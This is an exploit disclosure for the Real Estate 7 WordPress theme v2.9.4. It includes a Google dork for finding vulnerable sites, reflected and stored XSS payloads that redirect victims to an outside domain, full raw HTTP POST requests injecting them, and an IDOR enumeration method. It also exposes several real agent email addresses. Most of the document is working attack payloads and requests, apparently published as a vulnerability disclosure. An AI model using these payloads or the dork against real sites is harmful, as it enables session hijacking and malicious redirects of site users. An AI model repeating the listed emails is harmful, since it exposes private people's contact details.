# Exploit Title: Real Estate 7 WordPress v2.9.4 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/realestate-7/
# Date: 12/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://contempothemes.com/
# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
# Version: 2.9.4
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 200, 319
----[]- Info: -[]----
Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/
Demo account #1: agent/agent (login/password)
PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/
PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/
----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng
----[]- Persistent XSS -> Agent Profile: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable textarea: «Agent Testimonials» (checkbox on «Show on Agents Page» is required).
Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
PoC:
POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17074317185520
Content-Length: 3843
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1
-----------------------------17074317185520
Content-Disposition: form-data; name="first_name"
Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="last_name"
Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="nickname"
agent
-----------------------------17074317185520
Content-Disposition: form-data; name="display_name"
Agent Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="user_url"
-----------------------------17074317185520
Content-Disposition: form-data; name="description"
-----------------------------17074317185520
Content-Disposition: form-data; name="twitterhandle"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="facebookurl"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="instagramurl"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="linkedinurl"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="youtubeurl"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="isagent"
yes
-----------------------------17074317185520
Content-Disposition: form-data; name="agentorder"
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_profile_img"; filename=""
Content-Type: application/octet-stream
-----------------------------17074317185520
Content-Disposition: form-data; name="mobile"
6195556589
-----------------------------17074317185520
Content-Disposition: form-data; name="fax"
6195556588
-----------------------------17074317185520
Content-Disposition: form-data; name="title"
Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="tagline"
Selling the Dream!
-----------------------------17074317185520
Content-Disposition: form-data; name="agentlicense"
123456
-----------------------------17074317185520
Content-Disposition: form-data; name="userTestimonial"
<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_broker_logo"; filename=""
Content-Type: application/octet-stream
-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragename"
-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragelicense"
-----------------------------17074317185520
Content-Disposition: form-data; name="office"
6195553698
-----------------------------17074317185520
Content-Disposition: form-data; name="address"
101 Front St, Suite 100
-----------------------------17074317185520
Content-Disposition: form-data; name="city"
San Diego
-----------------------------17074317185520
Content-Disposition: form-data; name="state"
CA
-----------------------------17074317185520
Content-Disposition: form-data; name="postalcode"
92101
-----------------------------17074317185520
Content-Disposition: form-data; name="updateuser"
Update Profile
-----------------------------17074317185520
Content-Disposition: form-data; name="_wpnonce"
b2e5069987
-----------------------------17074317185520
Content-Disposition: form-data; name="_wp_http_referer"
/wp-real-estate-7/minimal-demo/account-settings/
-----------------------------17074317185520
Content-Disposition: form-data; name="action"
update-user
-----------------------------17074317185520--
----[]- Persistent Self-XSS -> Listing Email Alerts: -[]----
It's self-XSS, but still.
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
PoC:
POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 294
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/
Cookie: _your_cookies_here_
ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com
----[]- IDOR: -[]----
Parsing this URL https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX with 1-4 digits for the «p» parameter can lead you to some interesting results like this: https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/ (with package name, order date and unique login/author name as a useful information).
----[]- Information Exposure: -[]----
Each agent profile page contains the «Email» link as a pop-up form trigger. This form contains hidden input field with agent unique email address, for example:
<input type="hidden" id="ctyouremail" name="ctyouremail" value="chris@contempographicdesign.com" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="adams@adamsgroup.website" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="alpiskris@hotmail.com" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="skyking1978@gmail.com" />
Same result you can achieve by watching the source code of agent profile page (it's faster if you'll search in code for «@» symbol from the bottom).